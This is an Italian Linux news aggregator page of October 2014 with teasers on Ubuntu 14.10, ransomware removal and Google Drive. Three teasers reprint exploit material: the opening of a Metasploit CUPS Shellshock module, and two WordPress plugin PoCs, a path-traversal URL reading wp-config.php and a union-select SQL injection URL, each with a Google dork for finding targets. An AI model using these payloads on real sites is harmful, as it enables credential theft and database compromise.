Rimozione Virus Ransomware anche per utenti non esperti

28 ottobre 2014 - Fonte: http://www.mondounix.com
Un ransomware è un virus che cripta tutti i dati all'interno dell'hard disk e impedisce il regolare avvio di windows mostrando una schermata dove viene chiesto del denaro, in cambio dei dati sull'hard disk..
 
 
Ecco una guida passo passo per rimuovere il virus...
Occorrente:
1)Il pc infettato ( chiaramente )
2)Un CD o DVD vuoto
3)Un altro PC ( o il pc infetto con una connessione a internet)
 
 
Procedimento:
Questi tipi di Virus essenzialmente sono fatti per mandare in panico l'utente medio.... quindi uno dei consigli che dovete seguire: mantenervi calmi e rimanere concentrati su come si comporta il virus... perchè come tutto.. anche i virus hanno delle vulnerabilità.
Detto questo... possiamo iniziare....
1)All’avvio...

Leggi il seguito »

CUPS Filter Bash Environment Variable Code Injection

28 ottobre 2014 - Fonte: http://www.mondounix.com
##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
 
require 'msf/core'
 
class Metasploit4 < Msf::Exploit::Remote
  Rank = GoodRanking
  include Msf::Exploit::Remote::HttpClient
 
  def initialize(info = {})
    super(update_info(info,
      'Name' => 'CUPS Filter Bash Environment Variable Code Injection',
      'Description' => %q{
        This module exploits a post-auth code injection in specially crafted
        environment variables in Bash, specifically targeting CUPS filters
        through the PRINTER_INFO and PRINTER_LOCATION variables by default.
      },
      'Author' => [
        'Stephane Chazelas',...

Leggi il seguito »

Come integrare Google Drive in Ubuntu 14.10

28 ottobre 2014 - Fonte: http://www.chimerarevo.com

Il servizio Cloud di Google, Drive, è senza ombra di dubbio uno dei servizi più utilizzati anche grazie alla perfetta integrazione con Android lato mobile e con Windows/Mac su desktop.

Purtroppo per GNU/Linux non è stato ancora rilasciato nessun client ufficiale, nemmeno in beta o in preview. In questa guida vedremo come integrare comodamente lo spazio cloud di Google Drive in Ubuntu 14.10 e derivate con un client non ufficiale, a mio avviso il migliore per comodità e facilità d’utilizzo.

Integrare Google Drive in Ubuntu e derivate

Installare il Client di Google Drive è molto semplice,...

Leggi il seguito »

Ubuntu 14.10 Utopic Unicorn, le nostre impressioni

28 ottobre 2014 - Fonte: http://www.inthebit.it

La scorsa, è stata la settimana di Ubuntu, che si è aggiornato a 14.10, introducendo pochissime novità rispetto alla precedente.

L’unica novità che ho riscontrato è Unity 7.3.1, ma ci aspettavamo Unity 8, le prestazioni sono leggermente migliorato (al contrario la dashboard lagga di più sul mio PC), nuovi sfondi… e poi? Ubuntu 14.10 Utopic finisce qui. Almeno per quanto riguarda la parte “visiva”, ci sono stati dei rivisitamenti nel codice sorgente e l’introduzione del kernel Linux 3.16.

...

Leggi il seguito »

Ubuntu 14.10 Utopic Unicorn disponibile per il Download

28 ottobre 2014 - Fonte: http://www.gekissimo.net/
ubuntu 14.10
La distribuzione Ubuntu, probabilmente la più usata dagli utenti Linux, ha compiuto 10 anni. E per l'occasione ha rilasciato una nuova versione del suo sistema operativo che è disponibile dal 23 ottobre, chiamata "Utopic Unicorn".
A prima vista non ci sono grandi cambiamenti, ma le novità sembrano concentrarsi sopratutto sul miglioramento della sicurezza e della stabilità, oltre ad un aggiornamento generale del sistema...

Leggi il seguito »

WordPress Download Manager Arbitrary File Download

28 ottobre 2014 - Fonte: http://www.mondounix.com
# WordPress Download Manager Plugin - Arbitrary File Download
# CWE: CWE-98
# Risk: High
# Author: Hugo Santiago dos Santos
# Contact: hugo.s@linuxmail.org
# Date: 25/10/2014
# Vendor Homepage: https://wordpress.org/plugins/download-manager/
# Tested on: Windows 7 and Gnu/Linux
# Google Dork: inurl:/plugins/download-manager/
 
# VUL: /views/file_download.php?fname=
 
 or:
 
 /file_download.php?fname=
 
# PoC : 
 
 http://WEBSITE/wp-content/plugins/document_manager/views/file_download.php?fname=../../wp-config.php
 
 
# Xploit: Find one website with use /plugins/download-manager/ && ADD TO Link:/views/file_download.php?fname=../../wp-config.php

(12)

...

Leggi il seguito »

WordPress HTML5 / Flash Player SQL Injection

28 ottobre 2014 - Fonte: http://www.mondounix.com
# WordPress HTML5 and FLash PLayer Plugin SQL Injection
# CWE: CWE-89
# Risk: High
# Author: Hugo Santiago dos Santos
# Contact: hugo.s@linuxmail.org
# Date: 24/10/2014
# Vendor Homepage: https://wordpress.org/plugins/player/
# Tested on: Windows 7 and Gnu/Linux
# Google Dork: inurl: "Index of" +inurl:/wp-content/plugins/player/
 
# PoC : 
 
http://WEBSITE/wordpress/wp-content/plugins/player/settings.php?playlist=1&theme=1+and+0+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,table_name,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52 from information_schema.tables where table_schema=database()--
 
 
# Xploit: Are vulnerable sites that have...

Leggi il seguito »

Soddisfatti di Ubuntu 14.10 Utopic? (oggi parliamo di…)

27 ottobre 2014 - Fonte: http://www.lffl.org/
Chiediamo ai nostri lettori il parere su Ubuntu 14.10 Utopic Unicorn, nuova release stabile della distribuzione Linux più conosciuta al mondo.
Ubuntu 14.10 UtopicCanonical ha recentemente rilasciato Ubuntu 14.10 Utopic Unicorn, nuova release stabile già installata  o testata...

Leggi il seguito »

Diritto al Rimborso licenze di Microsoft: nasce la campagna “Fatti Rimborsare il Sistema (in)Operativo!”

27 ottobre 2014 - Fonte: http://www.lffl.org/
Italian Linux Society ha avviato la campagna "Fatti Rimborsare il Sistema (in)Operativo!" per sensibilizzare gli utenti a farsi rimborsare la licenza di Microsoft Windows.
Fatti Rimborsare il Sistema (in)Operativo!La maggior parte dei personal computer in vendita nei vari negozi dispone di Windows preinstallato, sistema operativo il cui costo della licenza è già incluso nel prezzo finale....

Leggi il seguito »

Ubuntu Touch si ‘divide’ in due rami di sviluppo

27 ottobre 2014 - Fonte: http://www.chimerarevo.com

Prima di Ubuntu Touch 14.09 RTM – ovvero la distribuzione dedicata agli smartphone stabile e “pronta per il mercato” - lo sviluppo principale (volendo tralasciare i rami “minori” dedicati prettamente agli sviluppatori) procedeva esclusivamente su un ramo ben definito: è così che il codice di base di Ubuntu Touch, partito dalla versione 12.10, è stato portato “progressivamente” alla versione stabile 14.09. Ed è proprio a causa della natura “stabile” del rilascio di Ubuntu Touch 14.09 che questa modalità di approccio non va più bene.

...

Leggi il seguito »